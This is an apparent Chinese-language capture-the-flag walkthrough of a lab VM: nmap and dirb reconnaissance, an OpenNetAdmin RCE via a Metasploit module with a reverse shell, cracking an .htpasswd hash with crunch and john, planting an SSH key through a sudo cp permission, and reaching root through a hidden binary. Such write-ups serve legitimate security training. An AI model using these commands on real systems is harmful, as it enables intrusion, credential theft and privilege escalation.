赞
踩
nmap -sP 192.168.246.0/24
,得到目标主机IP:192.168.246.147
nmap -sV -p 1-65535 192.168.246.147
dirb http://192.168.246.147
kali里搜一下相关漏洞:
searchsploit opennetadmin
刚刚好对应上了RCE。
进入该目录,然后./47691.sh http://192.168.246.147/ona/login.php
一直报错,中途进去删了空行,没改回原来的样子,大致是这样:
至于login.php是怎么找到,点击右上角的logout后,出现logout.php,试下login.php就出现登录界面。
去漏洞库找下EXP,看到个msf版的:
下载后拉进kali,我放的位置是/usr/share/metasploit-framework/modules/exploits/unix/
:
然后在msf里重新加载,reload_all
使用该exp:use exploit/unix/47772
查看所需配置:show options
设置目标IP,反弹IP:
set rhosts 192.168.246.147
set srvhost 192.168.246.138
set lhost 192.168.246.138
expolit
:
shell
后,获取交互式shell:
python -c 'import pty;pty.spawn("/bin/bash")'
进入html目录,查看文件:
根据.htaccess里的提示找到.htpasswd:
cd /var/www
ls -la
cat .htpasswd
是一个用户的账户密码,提示密码10位数且只有aefhrt这些字符,用crunch生成字典:
crunch 10 10 aefhrt -o /root/Desktop/dic.txt
将.htpasswd中的密码保存到文件中,使用生成的字典john爆破一下:
john --wordlist=/root/Desktop/dic.txt /root/Desktop/86-1.txt
得到密码:fatherrrrr
切换到douglas用户,然后查看权限:
/bin/cp也就是copy命令可以使用Jen用户权限免密执行,在douglas下,看到隐藏的.ssh,那么把它cp到jen目录下就可以使用ssh密钥登录jen了:
Linux密钥登录原理和ssh使用密钥实现免密码登陆
将公钥复制到jen里:
cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
登录:
ssh jen@192.168.246.147
登录上就提示You have new mail.
查看
cd /var/mail
ls
cat jen
看到一篇挺长的邮件:
重点在这里:
moss的密码是Fire!Fire!
切换用户:
cd
ls -la
来到moss的目录下看到隐藏的games:
进入该目录后查看文件,有个root:
打开看后是乱码,然后执行一下就蹦出了这个:
直接进入root目录,找到flag.txt:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。